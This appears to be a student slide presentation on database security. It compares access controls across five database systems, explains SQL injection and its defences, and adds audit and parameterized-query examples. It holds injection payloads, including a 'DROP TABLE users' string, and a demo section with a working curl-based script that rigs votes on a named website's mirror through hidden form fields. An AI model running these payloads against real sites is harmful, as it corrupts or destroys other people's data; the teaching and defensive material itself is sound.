Posted on 16-Dec-2014

Database Security

Types of attacks and mitigation strategies

Group Members:

Tushar Sugandhi

Natthapol Prakongpan

Travis Whilden

Brendan Kohlar

Jonathan Reitnauer

Database Access Control

Part I

Review Databases

• IBM DB2

• Oracle

• Microsoft SQL Server

• MySQL

• PostgreSQL

Security Mechanisms

• Authentication
  – Who is allowed access to the instance and/or database
  – Where and how a user's password will be verified

• Authorization
  – The authority level that a user is granted
  – The commands that a user is allowed to run
  – The data that a user is allowed to read and/or alter
  – The database objects a user is allowed to create, alter, and/or drop

• Privileges
  – Granular authorization

IBM DB2 Authentication

– Works closely with the security features of the underlying operating system to verify user IDs and passwords.

– Can use Kerberos to authenticate users.

IBM DB2 Authorization

• Determine the operations that users and/or groups can perform.

• Determine the data objects that users can access.

• Five authority levels:
  – SYSADM
  – SYSCTRL
  – SYSMAINT
  – DBADM
  – LOAD

IBM DB2 Privileges

• More granular than authorities.

• Can be assigned to users and/or groups.

• Help define the objects that a user can create or drop.

• Help define the commands that a user can use to access objects (tables, views, indexes, packages).

Oracle Security

• Authentication (Identity Management)

• Virtual Private Database

• Oracle Label Security
  – Row-level access control

Oracle Identity Management

• LDAP Directory Service

• Directory integration and provision services

• Authentication and authorization services

• Certificate authority (CA)

Oracle Virtual Private Database

• A policy (a function that returns a WHERE predicate) is attached to a table or view; the predicate is appended to every statement that touches the object, so the restriction cannot be bypassed from the application side.

• Relevant columns and masking: the policy can be made to fire only when specific columns are referenced, and can return NULL for the protected columns instead of hiding the whole row.

Oracle Label Security

• Provides a secure engine and data dictionary for managing access to data using sensitivity labels.

• Row-level security can be achieved with no programming required.

• Sensitivity labels on rows are compared with the labels granted to a user to determine the user's ability to view and update data.

Microsoft SQL Server

• Authentication

• Access Permission

• Roles

MS SQL Authentication

• Two methods for user authentication

• Windows authentication
  – Default and preferred
  – Credentials are verified by the underlying operating system (Kerberos or NTLM); SQL Server never sees the password

• SQL Server authentication
  – Strongly discouraged
  – Not as secure: the login and password are stored and verified by SQL Server itself and travel with the login request, so they are only as protected as the connection is (use an encrypted connection if it must be enabled)

MS SQL Access Permission

• Statement Permissions (the right to run statements such as CREATE DATABASE or CREATE TABLE)

• Object Permissions (SELECT, INSERT, UPDATE, DELETE, EXECUTE on a specific table, view or procedure)

MS SQL Roles

• Fixed server roles, fixed database roles and user-defined database roles: permissions are granted to a role and logins are added to it, rather than granting to each login individually

MySQL

• Limited security features (in the versions reviewed)

• Authentication

• Permission

MySQL Authentication

• Accounts live in the grant tables (user, db, tables_priv, columns_priv) of the mysql system database.

• Passwords are stored as hashes in mysql.user, but the grant tables are ordinary tables: anyone granted SELECT on the mysql database can read every hash and the complete privilege map.

• Can be viewed by anyone if privileges on the mysql database are not configured properly.

• No ties to the OS: an account is user@host and is checked by MySQL itself, not by the operating system.

• MySQL's root account has no password by default after installation; set one immediately.

MySQL Permission

• Table-level control

• Column-level control

• No row-level control (must be emulated with views)

PostgreSQL Authentication

• Configured per connection in pg_hba.conf: each line maps a connection type, database, user and client address to an authentication method.

• Trust Authentication
  – No authentication at all: every connection matching the line is accepted as whatever user it claims to be

• Password Authentication
  – md5, crypt, or password (cleartext), checked against the password stored for the role

• Kerberos Authentication
  – Kerberos authentication server

• Ident-based Authentication
  – Asks the client machine's ident server which OS user owns the connection and maps that user name to a database role; no password is involved

• Pluggable Authentication Module (PAM)
  – Custom authentication method through the OS PAM stack
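Because trust and password are the methods that either skip authentication or expose the password on the wire, an auditor's first question about a PostgreSQL host is what pg_hba.conf allows. The following is an added example, not part of the slides: a small parser for pg_hba.conf lines and an audit pass over them. The sample configuration, the WEAK_METHODS table and the function names are constructed for illustration; the parser assumes the CIDR address form (not the older separate-netmask form) and treats @file references as literal names.

```python
# Constructed sample pg_hba.conf (not from the slides); each line is one rule.
SAMPLE_PG_HBA = """\
# TYPE  DATABASE  USER      ADDRESS        METHOD         [OPTIONS]
local   all       postgres                 peer
local   all       all                      trust
host    all       all       127.0.0.1/32   md5
host    all       all       0.0.0.0/0      trust
host    app       app       10.0.0.0/8     password
hostssl app       app       10.0.0.0/8     scram-sha-256  clientcert=verify-full
"""

# Methods that either skip authentication or expose the password on the wire.
WEAK_METHODS = {
    "trust": "no authentication: every matching connection is accepted as the user it names",
    "password": "password sent in cleartext; only acceptable on a hostssl line",
    "crypt": "crypt() hashing (removed in PostgreSQL 8.4); use md5 or scram-sha-256",
}
ANY_ADDRESS = {"0.0.0.0/0", "::/0", "all"}


def parse_pg_hba(text):
    """Parse pg_hba.conf lines into dicts (assumes the CIDR address form)."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()      # drop comments and blank lines
        if not line:
            continue
        fields = line.split()
        conn_type = fields[0]
        if conn_type == "local":                  # local lines have no ADDRESS column
            if len(fields) < 4:
                raise ValueError("line %d: too few fields" % lineno)
            database, user, address, method = fields[1], fields[2], None, fields[3]
            options = fields[4:]
        else:
            if len(fields) < 5:
                raise ValueError("line %d: too few fields" % lineno)
            database, user, address, method = fields[1:5]
            options = fields[5:]
        entries.append({"line": lineno, "type": conn_type, "database": database,
                        "user": user, "address": address, "method": method,
                        "options": options})
    return entries


def audit_pg_hba(text):
    """Return (line, method, reason) for every rule that uses a weak method."""
    findings = []
    for e in parse_pg_hba(text):
        reason = WEAK_METHODS.get(e["method"])
        if reason is None:
            continue
        if e["method"] == "password" and e["type"] == "hostssl":
            continue                              # TLS protects the cleartext password
        if e["address"] in ANY_ADDRESS:
            reason += " (and the line matches every client address)"
        findings.append((e["line"], e["method"], reason))
    return findings


if __name__ == "__main__":
    for line, method, reason in audit_pg_hba(SAMPLE_PG_HBA):
        print("pg_hba.conf:%d: %s: %s" % (line, method, reason))
```

Run against the sample it reports the local trust line, the trust line open to every address, and the cleartext password line; the hostssl scram-sha-256 line passes. Lines are matched in order by PostgreSQL, so a trust line near the top silently overrides stricter lines below it.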

PostgreSQL Permission

• Read
  – SELECT

• Append
  – INSERT

• Write
  – UPDATE/DELETE

• Rules
  – The RULE privilege let a user create rewrite rules on a table (removed in PostgreSQL 8.2)

• Superuser
  – Bypasses all permission checks

Features Comparison

                 DB2              Oracle           MS SQL           MySQL              PostgreSQL
Authentication   Multiple (Good)  Multiple (Good)  OS (No Option)   User Table (Poor)  Multiple (Good)
Permission       Good             Good             Good             Poor               Good
Row Level        View             Native           View             View               View

SQL INJECTION ATTACKS

THE BASICS

Part II

What is SQL Injection?

• A vulnerability in the application layer that talks to the database, not in the DBMS itself

• Improperly handled user input is concatenated into the text of a SQL statement, so the DBMS parses data as code

Where is it Done?

• Potentially any field requiring user input!
  – The user name or password field of a login form is the location most commonly associated with SQL injection

Specifically…

• SQL Injection attacks can be broken down into the exploitation of two vulnerabilities
  – Improper removal of escape characters
  – Weak type enforcement

Vulnerability: Escape Characters

• When characters that have meaning in the SQL grammar (above all the single quote that delimits a string literal) are not filtered or escaped in user input
  – The input terminates the current literal and everything after it is parsed as SQL, for example a tautology that sets a dummy value equal to itself

• The condition 'X' = 'X' is always true

Example: Escape Characters Exploit

• Application prompts user for userName:
  – statement := "SELECT * FROM users WHERE name = '" + userName + "';"

• User enters partial SQL code at the prompt:
  – a' or 't'='t

• statement becomes:
  – SELECT * FROM users WHERE name = 'a' or 't'='t';

• The OR condition is always true, so the query returns every row in users instead of one

Vulnerability: Weak Type Enforcement

• When type constraints are not properly implemented for user input
  – A malicious user supplies a value of a type (for example a string) that the input was never intended to accept

Example: Weak Type Enforcement Exploit

• Application prompts user for a numeric value to select a row and builds:
  – statement := "SELECT * FROM data WHERE id = " + a_variable + ";"

• User enters a string instead of a number:
  – 1;DROP TABLE users

• statement becomes:
  – SELECT * FROM data WHERE id = 1;DROP TABLE users;

• Execution deletes the users table from the database, provided the database API executes stacked statements; a single-statement API such as PHP's mysql_query() would refuse the second statement, which limits this particular payload but not the injection itself

Protection From Attack

• Sanitize the data

• Secure the application

• Safeguard the input

• Use stored procedures

Protection: Sanitize the Data

• More than simply adding backslashes!
  – Use a default-deny (allow-list) regular expression that lets through only the characters the field needs:
    • s/[^0-9a-zA-Z]//g strips everything except alphanumeric characters
  – Strip quotation marks

Protection: Secure the Application

• People are the weakest link
  – Limit access to only those who need it!
  – Set each individual's access, and the database account the application itself connects with, to the lowest permissions required, so that an injected DROP TABLE fails on privilege rather than on luck

Protection: Safeguard the Input

• Check your database interface for its input-handling functions
  – Proper quote handling in string parsing
  – Deal with backslashes accordingly

Protection: Use Stored Procedures

• A viable alternative…
  – Resolves issues with dynamic input, as long as the procedure itself does not build dynamic SQL from its arguments
  – Tailored to the specific needs of the database
  – The underlying principle is the same as for prepared (parameterized) statements: user data is passed to the DBMS separately from the statement text and is never parsed as SQL
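The two exploits above and the protections that follow, as an added Python example that is not part of the slides: it builds both vulnerable statements exactly as the slides do against an in-memory SQLite database, then shows the bound-parameter and type-check versions the protection slides argue for. The table contents, the function names and the use of executescript() to model a database API that accepts stacked statements are assumptions for illustration.

```python
import sqlite3


def make_db():
    """Constructed sample data (not from the slides): the two tables the examples name."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password TEXT);
        INSERT INTO users (name, password) VALUES ('alice', 's3cret'), ('bob', 'hunter2');
        CREATE TABLE data (id INTEGER PRIMARY KEY, value TEXT);
        INSERT INTO data (value) VALUES ('row one'), ('row two');
    """)
    return conn


def table_exists(conn, name):
    row = conn.execute(
        "SELECT 1 FROM sqlite_master WHERE type = 'table' AND name = ?", (name,)
    ).fetchone()
    return row is not None


# --- Escape characters: SELECT * FROM users WHERE name = '<userName>' ---

def lookup_user_vulnerable(conn, user_name):
    # The slide's construction: a quote inside user_name closes the literal and
    # everything after it is parsed as SQL.
    statement = "SELECT * FROM users WHERE name = '" + user_name + "';"
    return conn.execute(statement).fetchall()


def lookup_user_safe(conn, user_name):
    # Bound parameter: the value reaches the engine separately from the statement
    # text, so a quote in it can only be compared, never parsed.
    return conn.execute("SELECT * FROM users WHERE name = ?", (user_name,)).fetchall()


# --- Weak type enforcement: SELECT * FROM data WHERE id = <a_variable> ---

def select_row_vulnerable(conn, a_variable):
    statement = "SELECT * FROM data WHERE id = " + a_variable + ";"
    # executescript() models a database API that runs stacked statements, which the
    # slide's DROP TABLE payload needs. sqlite3's execute() (like PHP's mysql_query())
    # would reject the second statement instead.
    conn.executescript(statement)


def select_row_safe(conn, a_variable):
    # Type enforcement first: int() refuses "1;DROP TABLE users" with ValueError
    # before any SQL is built; the integer is then bound, not concatenated.
    row_id = int(a_variable)
    return conn.execute("SELECT * FROM data WHERE id = ?", (row_id,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print(lookup_user_vulnerable(db, "a' or 't'='t"))   # every row in users
    print(lookup_user_safe(db, "a' or 't'='t"))         # []
    print(select_row_safe(db, "1"))                      # [(1, 'row one')]
    select_row_vulnerable(db, "1;DROP TABLE users")
    print(table_exists(db, "users"))                     # False
```

The safe versions do no quoting or escaping of their own: the separation of code and data is done by the driver, which is why the same approach works regardless of which characters a particular DBMS treats as special.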

DEMO

Part III

SQL Injection Demo

Attack a real website using SQL injection

SQL Injection Demo

• Bestthing.info: Comparing apples to oranges and oranges to racecars.

• User-driven content with database backend

• Quest to find the “best thing ever”

• Mirror of the site at injection.pycoder.net

Plan of attack

• Put a phrase at the top of the “Best” phrases

• Must get around the protection against duplicate votes from the same IP address.

Site Code

HTML:

<!-- tid0 and tid1 are hidden inputs, so the client fully controls them -->
<form method="post" action="/">
  <div>
    <input name="tid0" value="27356" type="hidden" />
    <input name="tid1" value="35705" type="hidden" />
    <input name="A" type="submit" value="Having a funny hat" />
    or
    <input name="B" type="submit" value="Bs" />
    <br /><br />
    <input type="submit" name="d" value="Report this pair as a duplicate." />
  </div>
</form>

PHP:

// Every $_POST value is concatenated straight into the statement text; only the
// IP is converted (ip2long) and only the vote is normalised (isset ? 1 : 0).
mysql_query('INSERT INTO votes (ip,time,tid0,tid1,vote) VALUES ('
    . ip2long($_SERVER['REMOTE_ADDR']) . ',now(),'
    . $_POST['tid0'] . ',' . $_POST['tid1'] . ','
    . (isset($_POST['A']) ? 1 : 0) . ')');
// The affected-rows check appears to be the duplicate protection: a repeat vote
// from the same IP on the same pair does not insert, so the tallies stay unchanged.
// $forA, $o and $t are set elsewhere in the site code (not shown on the slide).
if (mysql_affected_rows() > 0) {
    mysql_query('UPDATE thing SET votesFor=votesFor+' . $forA
        . ', votesTotal=votesTotal+1 WHERE tid=' . $o);
    mysql_query('UPDATE thing SET votesFor=votesFor+' . ($forA ? 0 : 1)
        . ', votesTotal=votesTotal+1 WHERE tid=' . $t);
}

Attack Code

Python Script:

#!/usr/bin/python
import random
import subprocess   # getoutput() replaces the Python 2 commands module

# Each vote row must be unique per IP, so every request uses a fresh random
# (tid0, tid1) pair; the pair never has to exist in the thing table.
x = [random.randint(4000, 400000)]
for n in range(600):
    while True:
        p = random.randint(4000, 400000)
        if p not in x:
            x.append(p)
            break
    # tid0 closes the VALUES list after (ip, now(), p, q, 1) and "#" comments out
    # the rest of the INSERT, so the row is inserted and affected rows is 1.
    # tid1 then lands in the second UPDATE's WHERE clause (presumably $t) as
    # "tid=-1 or thing='test'", adding one vote to the "test" entry per request.
    subprocess.getoutput(
        (r"curl -d tid0=%i,%i,1\)\ # -d tid1=-1\ or\ "
         r"thing=\'test\' -d B=submit "
         r"http://injection.pycoder.net") % (x[-2], x[-1]))
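The demo's queries and payload replayed offline, as an added Python example that is not part of the slides or of the site's code: the PHP vote handler is ported line for line onto an in-memory SQLite database, the curl payload is sent through it, and a hardened handler is shown beside it. Assumptions: SQLite's "--" stands in for MySQL's "#" line comment, the duplicate-vote protection is a UNIQUE constraint on (ip, tid0, tid1), $o and $t are the posted tid0 and tid1, and the thing table contents are constructed.

```python
import sqlite3


def make_vote_db():
    """Constructed stand-in for the site's schema (the slides show only the queries)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE thing (tid INTEGER PRIMARY KEY, thing TEXT,
                            votesFor INTEGER DEFAULT 0, votesTotal INTEGER DEFAULT 0);
        INSERT INTO thing (tid, thing) VALUES
            (27356, 'Having a funny hat'), (35705, 'Bs'), (1, 'test');
        -- Assumed duplicate-vote protection: one row per IP and pair.
        CREATE TABLE votes (ip INTEGER, time TEXT, tid0 INTEGER, tid1 INTEGER, vote INTEGER,
                            UNIQUE (ip, tid0, tid1));
    """)
    return conn


def _mysql_query(conn, sql):
    """Mimics PHP mysql_query(): a failed query is not an exception, affected rows is -1."""
    try:
        return conn.execute(sql).rowcount
    except sqlite3.Error:
        return -1


def record_vote_vulnerable(conn, ip, post):
    """The slide's PHP, with every POST value concatenated into the statement text."""
    for_a = 1 if "A" in post else 0
    affected = _mysql_query(conn,
        "INSERT INTO votes (ip,time,tid0,tid1,vote) VALUES (" + str(ip) + ",datetime('now'),"
        + post["tid0"] + "," + post["tid1"] + "," + str(for_a) + ")")
    if affected > 0:
        _mysql_query(conn, "UPDATE thing SET votesFor=votesFor+" + str(for_a)
                     + ", votesTotal=votesTotal+1 WHERE tid=" + post["tid0"])
        _mysql_query(conn, "UPDATE thing SET votesFor=votesFor+" + str(1 - for_a)
                     + ", votesTotal=votesTotal+1 WHERE tid=" + post["tid1"])
    return affected


def record_vote_safe(conn, ip, post):
    """Same logic with type enforcement and bound parameters; returns rows inserted."""
    tid0, tid1 = int(post["tid0"]), int(post["tid1"])   # ValueError on the attack payload
    for_a = 1 if "A" in post else 0
    try:
        affected = conn.execute(
            "INSERT INTO votes (ip,time,tid0,tid1,vote) VALUES (?,datetime('now'),?,?,?)",
            (ip, tid0, tid1, for_a)).rowcount
    except sqlite3.IntegrityError:
        return 0                                         # duplicate vote, nothing tallied
    conn.execute("UPDATE thing SET votesFor=votesFor+?, votesTotal=votesTotal+1 WHERE tid=?",
                 (for_a, tid0))
    conn.execute("UPDATE thing SET votesFor=votesFor+?, votesTotal=votesTotal+1 WHERE tid=?",
                 (1 - for_a, tid1))
    return affected


def attack_post(p, q):
    """What the demo's curl sends, with '--' in place of MySQL's '#'.

    tid0 closes the VALUES list after a fresh (p, q, 1) row and comments out the
    rest, so the INSERT succeeds and affected rows is 1; tid1 then turns the
    second UPDATE's WHERE clause into "tid=-1 or thing='test'".
    """
    return {"tid0": "%i,%i,1) -- " % (p, q), "tid1": "-1 or thing='test'", "B": "submit"}


def tally(conn, name):
    return conn.execute("SELECT votesFor, votesTotal FROM thing WHERE thing = ?",
                        (name,)).fetchone()


if __name__ == "__main__":
    db, ip = make_vote_db(), 167772161
    for pair in ((4001, 4002), (4003, 4004)):
        record_vote_vulnerable(db, ip, attack_post(*pair))
    print(tally(db, "test"))   # (2, 2): two votes for a pair nobody was ever shown
```

The first UPDATE in the vulnerable path fails with a syntax error on every attack request (its WHERE clause becomes "tid=4001,4002,1) --"), and exactly as in the PHP the failure is ignored, so only the attacker's chosen entry gains votes. The hardened handler never reaches SQL with the payload: int() rejects it, and even a well-formed pair can only be counted once per IP because the uniqueness check is enforced by the database, not by the statement text.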

Thank you !!!